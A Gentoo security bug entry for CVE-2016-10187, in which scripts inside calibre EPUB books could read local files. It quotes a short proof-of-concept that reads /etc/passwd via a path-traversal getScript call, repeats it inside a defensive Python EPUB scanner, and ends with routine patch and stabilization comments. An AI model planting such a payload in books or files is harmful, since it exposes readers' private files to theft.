Bug 607836 (CVE-2016-10187) - <app-text/calibre-2.78.0: javascript in books can access files on the computer using XMLHttpRequest
Summary: <app-text/calibre-2.78.0: javascript in books can access files on the compute...
Status: RESOLVED FIXED
Alias: CVE-2016-10187
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
: Normal trivial (vote)
Assignee: Gentoo Security
URL: https://bugs.launchpad.net/calibre/+b...
Whiteboard: B4 [noglsa]
Reported: 2017-01-31 18:05 UTC by Thomas Deutschmann (RETIRED)
Modified: 2017-02-16 12:39 UTC

Package list:
=app-text/calibre-2.78.0
Runtime testing required: ---
stable-bot: sanity-check+
Description Thomas Deutschmann (RETIRED) gentoo-dev 2017-01-31 18:05:51 UTC
From $URL:

Calibre can access local files using JavaScript in an EPUB file.

Code snippet:
> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
> <script>
>     $.getScript( "../../../../../../../../etc/passwd", function( data, textStatus, jqxhr ) {
>         document.write('<h1>Your data</h1><pre>' + data + '</pre>');
>     });
> </script>

An attacker can steal any of the victim's files and send them to a server.
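
A defender-side check for the issue described above, as an added example that is not part of the original report or of calibre's code: a heuristic Python scanner that flags script references in an EPUB that point at remote hosts or resolve outside the book's container. The function names and the sample archive are constructed for this illustration.

```python
import io, posixpath, re, zipfile
from html.parser import HTMLParser
STRING_LITERAL = re.compile(r"""(["'])(.*?)\1""")  # quoted strings in inline JS (heuristic)

class ScriptFinder(HTMLParser):  # hypothetical helper: collects script src values and inline JS
    def __init__(self):
        super().__init__()
        self.in_script, self.srcs, self.inline = False, [], []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.srcs += [v for k, v in attrs if k == "src" and v]
    def handle_endtag(self, tag):
        self.in_script = self.in_script and tag != "script"
    def handle_data(self, data):
        if self.in_script:
            self.inline.append(data)

def classify(ref, doc_path):  # label a reference made from doc_path; None if it stays in the book
    low = ref.strip().lower()
    if low.startswith(("http://", "https://", "//")):
        return "remote"
    if low.startswith(("file:", "/")):
        return "absolute-local"
    path = re.split(r"[?#]", ref.strip())[0]
    resolved = posixpath.normpath(posixpath.join(posixpath.dirname(doc_path), path))
    return "escapes-container" if resolved == ".." or resolved.startswith("../") else None

def scan_epub(data):  # returns sorted (member, kind, reference) findings for EPUB bytes
    findings = set()
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.lower().endswith((".xhtml", ".html", ".htm")):
                finder = ScriptFinder()
                finder.feed(zf.read(name).decode("utf-8", "replace"))
                finder.close()
                literals = [m.group(2) for m in STRING_LITERAL.finditer("".join(finder.inline))]
                findings |= {(name, classify(r, name), r) for r in finder.srcs + literals
                             if classify(r, name)}
    return sorted(findings)

def build_sample():  # constructed input: a minimal zip holding the snippet quoted in this bug
    page = ('<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>'
            '<script>$.getScript("../../../../../../../../etc/passwd", function(data) {'
            " document.write('<h1>Your data</h1><pre>' + data + '</pre>'); });</script>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("OEBPS/ch1.xhtml", page)
    return buf.getvalue()
```

Running `scan_epub(build_sample())` reports the traversal path and the remote jQuery include; ordinary relative references such as `../images/a.png` from a nested chapter are not flagged.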
Comment 1 Thomas Deutschmann (RETIRED) gentoo-dev 2017-01-31 18:12:00 UTC
Upstream patch:

https://github.com/kovidgoyal/calibre/commit/3a89718664cb8cce0449d1758eee585ed0d0433c


@ Maintainer(s): Please bump to >=app-text/calibre-2.75.0.
Comment 3 Thomas Deutschmann (RETIRED) gentoo-dev 2017-02-13 01:35:18 UTC
@ Maintainer(s): Can we already start stabilizing =app-text/calibre-2.78.0?
Comment 4 Zac Medico gentoo-dev 2017-02-14 19:45:47 UTC
Yes, please stabilize it.
Comment 5 Thomas Deutschmann (RETIRED) gentoo-dev 2017-02-14 20:53:20 UTC
@ Arches,

please test and mark stable: =app-text/calibre-2.78.0
Comment 6 Agostino Sarubbo gentoo-dev 2017-02-15 11:53:19 UTC
amd64 stable
Comment 7 Agostino Sarubbo gentoo-dev 2017-02-15 15:56:25 UTC
x86 stable.

Maintainer(s), please cleanup.
Security, please vote.
Comment 9 Thomas Deutschmann (RETIRED) gentoo-dev 2017-02-16 12:39:49 UTC
GLSA Vote: No

Repository is clean, all done!